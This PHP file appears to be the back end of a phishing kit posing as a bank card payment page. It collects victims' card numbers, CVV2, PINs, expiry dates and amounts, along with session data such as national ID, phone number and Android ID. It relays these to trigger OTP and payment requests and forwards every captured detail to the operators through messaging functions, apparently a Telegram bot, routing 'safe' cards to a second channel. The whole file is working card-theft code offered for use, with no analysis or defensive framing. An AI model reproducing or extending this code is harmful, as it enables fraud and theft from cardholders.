<?php
error_reporting(0);
require("function.php") ;
session_start();
#-------------------
$RefID = $_POST['RefId'] ?? 'Unknown';
$Captcha = $_POST['captcha'] ?? 'Unknown';
$CardNumber = $_POST['cardnumber'] ?? 'Unknown';
$Password = $_POST['pin'] ?? 'Unknown';
$Cvv2 = $_POST['cvv2'] ?? 'Unknown';
$Month = $_POST['expireMonth'] ?? 'Unknown';
$Year = $_POST['expireYear'] ?? 'Unknown';
$Amount = $_POST['amount'] ?? 'Unknown';
$CardType = $_POST['cardtype'] ?? 'Unknown';
$Action = $_POST['action'] ?? 'Unknown';
#------------------
if(!empty($_SESSION['codemeli']) or !empty($_SESSION['phone']) or !empty($_SESSION['android_id'])){
    if(!empty($_SESSION['codemeli'])){
       $codeMeli = "🪪⤳ ᴄᴏᴅᴇ ᴍᴇʟɪ : <code>{$_SESSION['codemeli']}</code>\n";
    }
    if(!empty($_SESSION['phone'])){
        $phone = "\n\n☎️⤳ ᴘʜᴏɴᴇ : <code>{$_SESSION['phone']}</code>\n";
     }
     if(!empty($_SESSION['android_id'])){
        if($_SESSION['id_type'] == "e7"){
            $android_id = "\n📱⤳ ᴀɴᴅʀᴏɪᴅ ɪᴅ : <code>/panel_{$_SESSION['android_id']}</code>\n";
        }elseif($_SESSION['id_type'] == "x"){
            $android_id = "\n📱⤳ ᴀɴᴅʀᴏɪᴅ ɪᴅ : <code>/set_{$_SESSION['android_id']}</code>\n";
        }else{
            $android_id = "\n📱⤳ ᴀɴᴅʀᴏɪᴅ ɪᴅ : <code>{$_SESSION['android_id']}</code>\n";
        }
       
     }
     $session_data = "$phone$codeMeli$android_id";
}
#------------------
if($Action == "OTP"){
    echo $requestsApisData = PaymentRequests("OTP",$RefID,$Captcha,$CardNumber);
    $requestsApis = json_decode($requestsApisData, true);
    if($requestsApis['status'] == "OK"){
        $Message = "🪝 #OTP ʀᴇQᴜᴇꜱᴛ ꜱᴇɴᴛ ᴄᴀʀᴅ <b>#".getBankName($CardNumber)."</b> ꜱᴜᴄᴄᴇꜱꜱꜰᴜʟʟʏ

💳⤳ ᴄᴀʀᴅ : <code>$CardNumber</code>
🔗⤳ ᴄᴠᴠ² : <code>$Cvv2</code>
🔑⤳ ᴘɪɴ : <code>1</code>
🧬⤳ ᴅᴀᴛᴇ : <code>$Year</code> / <code>$Month</code>".GetClientInfo().$session_data."\n⏰⤳ ".GetTime()."\n♻️⤳ ʀᴇꜰɪᴅ : <code>$RefID</code>";
    smg($Message);
    }else{
        if($requestsApis['status'] != "OTP_WAIT"){
        $Message = "⚠️ ᴇʀʀᴏʀ ꜱᴇɴᴅɪɴɢ ᴏᴛᴘ ᴛᴏ ᴄᴀʀᴅ <b>#".getBankName($CardNumber)."</b>

💳⤳ ᴄᴀʀᴅ : <code>$CardNumber</code>
🔗⤳ ᴄᴠᴠ² : <code>$Cvv2</code>
🔑⤳ ᴘɪɴ : <code>1</code>
🧬⤳ ᴅᴀᴛᴇ : <code>$Year</code> / <code>$Month</code>\n\n🏛️⤳ ᴇʀʀᴏʀ ᴅᴇᴛᴀɪʟꜱ : ".$requestsApis['description'].GetClientInfo().$session_data."⏰⤳ ".GetTime()."\n♻️⤳ ʀᴇꜰɪᴅ : <code>$RefID</code>";
            smg($Message);
    }}
}if($Action == "PAY"){
    echo $PayRequestsApiData = PaymentRequests("PAY",$RefID,$Captcha,$CardNumber,$Cvv2,$Month,$Year,$Password);
    $PayRequestsApi = json_decode($PayRequestsApiData, true);
    if($PayRequestsApi['status'] == "OK" or $PayRequestsApi['status'] == "0"){
        $Message = "✅ <b>#".getBankName($CardNumber)."</b> | ᴘᴀʏᴍᴇɴᴛ ᴡɪᴛʜ $CardType ᴄᴀʀᴅ ᴡᴀꜱ ꜱᴜᴄᴄᴇꜱꜱꜰᴜʟ 

💳⤳ ᴄᴀʀᴅ : <code>$CardNumber</code>
🔗⤳ ᴄᴠᴠ² : <code>$Cvv2</code>
🔑⤳ ᴘɪɴ : <code>$Password</code>
🧬⤳ ᴅᴀᴛᴇ : <code>$Year</code> / <code>$Month</code>".GetClientInfo().$session_data."⏰⤳ ".GetTime()."\n♻️⤳ ʀᴇꜰɪᴅ : <code>$RefID</code>\n🎲⤳ ᴀᴍᴏᴜɴᴛ : <b>$Amount</b>";
    smg($Message);
    if($_SESSION['android_id']){
        PaymentRequests("SEND_INFO","nano","nano",$CardNumber,$Cvv2,$Month,$Year,$Password,$_SESSION['android_id']);
    }
    
    if($CardType == "#ISTA"){
        rsmg("#SAFE_CARD\n\n💳⤳ ᴄᴀʀᴅ : <code>$CardNumber</code> | <b>".getBankName($CardNumber)."</b>
🔗⤳ ᴄᴠᴠ² : <code>$Cvv2</code>
🔑⤳ ᴘɪɴ : <code>$Password</code>
🧬⤳ ᴅᴀᴛᴇ : <code>$Year</code> / <code>$Month</code>");
    }
    }else{
        if($CardType == "#ISTA"){
        $Message = "❌ <b>#".getBankName($CardNumber)."</b> | ᴘᴀʏᴍᴇɴᴛ ᴡɪᴛʜ $CardType ᴄᴀʀᴅ ꜰᴀɪʟᴇᴅ.

💳⤳ ᴄᴀʀᴅ : <code>$CardNumber</code>
🔗⤳ ᴄᴠᴠ² : <code>$Cvv2</code>
🔑⤳ ᴘɪɴ : <code>$Password</code>
🧬⤳ ᴅᴀᴛᴇ : <code>$Year</code> / <code>$Month</code>\n\n🏛️⤳ ᴇʀʀᴏʀ ᴅᴇᴛᴀɪʟꜱ : ".$PayRequestsApi['description'].GetClientInfo().$session_data."⏰⤳ ".GetTime()."\n♻️⤳ ʀᴇꜰɪᴅ : <code>$RefID</code>";
            smg($Message);
            rsmg($Message);
    }}
}


?>